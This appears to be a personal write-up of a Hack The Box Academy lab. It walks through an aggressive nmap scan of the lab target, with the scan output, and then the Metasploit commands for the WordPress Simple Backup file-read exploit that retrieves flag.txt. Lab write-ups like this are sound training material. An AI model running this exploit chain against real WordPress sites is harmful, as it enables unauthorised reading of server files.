One thing that frustrates me a bit when it comes to HTB academy is that it practically forces you to buy the yearly, that way you can actually "learn" how to do the class. Therefore, I figured might as well do some write-ups for anyone who needs help.
+
+
Firstly, make sure to spawn the target in, in my case,
+
+
+
+
Something to note about hackthebox attacks that isn't mentioned within the academy, is that the port number is where the malicious *thing* is, it's a neat little hint for things like this.
+
+
In the previous lessons, it taught us about nmap, however, the first command that should be ran is
+
```
+
sudo nmap -A -p 47782 94.237.58.137
+
```
+
_Side Note, if you want to know the "proper" way to sccan for the ports, just do `nmap -sV -sC -p- [Target IP]` might take a bit though.
+
+
This will do an "aggressive" scan, which basically does all of the following without requiring us to actually put in the command:
+
- OS Detection (-O): Attempts to identify the operating system running on the target.
+
- Version Detection (-sV): Probes open ports to determine what specific service and version number are running (e.g., Apache 2.4.41 instead of just "http").
+
- Script Scanning (-sC): Runs a collection of default Nmap Scripting Engine (NSE) scripts to check for common vulnerabilities or gather more information about services.
+
- Traceroute (--traceroute): Maps the network path from your machine to the target host.
+
Additionally, the -p causes the specific port to be scanned.
+
+
```
+
└──╼ [★]$ sudo nmap -A -p 47782 94.237.58.137
+
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-12-19 05:33 CST
OS CPE: cpe:/o:google:android:4.4.0 cpe:/o:linux:linux_kernel cpe:/h:cisco:cp-dx80 cpe:/o:google:android cpe:/h:linksys:ea3500 cpe:/o:linux:linux_kernel:3 cpe:/o:google:android:4.0.4
+
Aggressive OS guesses: Android 4.4.0 (92%), Websense Content Gateway (91%), Cisco CP-DX80 collaboration endpoint (Android) (91%), Linksys EA3500 WAP (91%), Linux 3.6 - 3.10 (90%), Axis M3006-V network camera (89%), Android 4.0.4 (Linux 2.6) (89%), Linux 2.6.18 - 2.6.24 (89%), Linux 3.16 (89%), Suga embedded WiFi module (89%)
+
No exact OS matches for host (test conditions non-ideal).
+
Network Distance: 6 hops
+
+
TRACEROUTE (using port 47782/tcp)
+
HOP RTT ADDRESS
+
1 0.13 ms 94.237.48.1
+
2 0.23 ms 100.69.43.225
+
3 0.25 ms 172.17.252.33
+
4 0.25 ms 172.17.252.38
+
5 0.23 ms 100.69.45.147
+
6 0.38 ms 94-237-58-137.uk-lon1.upcloud.host (94.237.58.137)
+
+
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
+
Nmap done: 1 IP address (1 host up) scanned in 16.15 seconds
+
+
```
+
Here we can see it's "Just Another Wordpress Site". Therefore, if we try to go to the domain:
+
+
+
+
Now it's time to use metasploit and see what we can do
+
```
+
msfconsole
+
```
+
Next, we need to search for an exploit. rather than trying to be extremely complex and such, let's just look for wordpress and the plugin that's quite literally... on the screen.
+
```
+
search WordPress 2.7.10
+
```
+
From there we will see an output in regards to the exploits, there will only be one.
+
```
+
use exploit/unix/webapp/wp_simple_backup_file_read
+
```
+
Then, like in previous tutorials, we need to see what kind of information we must put in to use the exploit, therefore:
+
```
+
show options
+
```
+
Here we see that we need to set RHOST, RPORT, and FILEPATH. therefore
+
```
+
set RHOST [TARGET IP]
+
set PORT [TARGET PORT IP]
+
set FILEPATH flag.txt
+
```
+
afterwards, simply type `exploit`.
+
+
then you can type `exit` upon execution, and find the file that you requested within your file manager. in my case it was just in the home directory and contained the flag.
